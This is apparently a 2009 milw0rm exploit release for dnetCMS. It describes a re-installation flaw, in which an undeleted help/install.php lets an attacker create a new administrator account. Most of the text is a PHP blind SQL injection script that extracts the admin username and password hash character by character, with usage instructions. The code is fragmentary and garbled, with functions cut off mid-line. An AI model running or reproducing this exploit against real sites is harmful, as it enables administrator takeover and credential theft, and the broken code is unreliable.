+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ - __ __ _ __ - + ____/ /___ ______/ /__ (_)___ / /_____ _____ + - / __ / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/ - + / /_/ / /_/ / / / ,< / / /_/ / ,< / __/ / + - \__,_/\__,_/_/ /_/|_|_/ /\____/_/|_|\___/_/ - + /___/ + - - +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [+] Arbitrary Re-Installation Vulnerability There's no check about the elimination of 'help' directory, then whenever an administrator forget to delete it, we can re-install the CMS, it means we can add a new administrator account, without specify database's informations. http://hostname/dnetCMS/help/install.php [+] Blind SQL Injection Exploit \n". "[+] Ex. : php xpl.php localhost /dnetCMS/\n". "[+] Greetz : cristina, puccio (they kept me company when I coded this stuff :D)\n". "\n"); } function hex ($string) { $i=0; while ($iCannot modify:|", $reply))) return false; else return true; } function get_field ($hostname, $path, $field) { echo "[+] ".ucfirst($field)." (hash): "; $chars = "abcdef0123456789"; for($i=0,$d=1;$d<=32;$i++) { if (check ($hostname, $path, $chars [$i], $d, $field)) { echo $chars [$i]; $i = -1; $d++; } } echo "\n"; } if ($argc != 3) usage (); $hostname = $argv [1]; $path = $argv [2]; $fields = array ("username", "password"); foreach ($fields as $field) get_field ($hostname, $path, $field); # milw0rm.com [2009-07-11]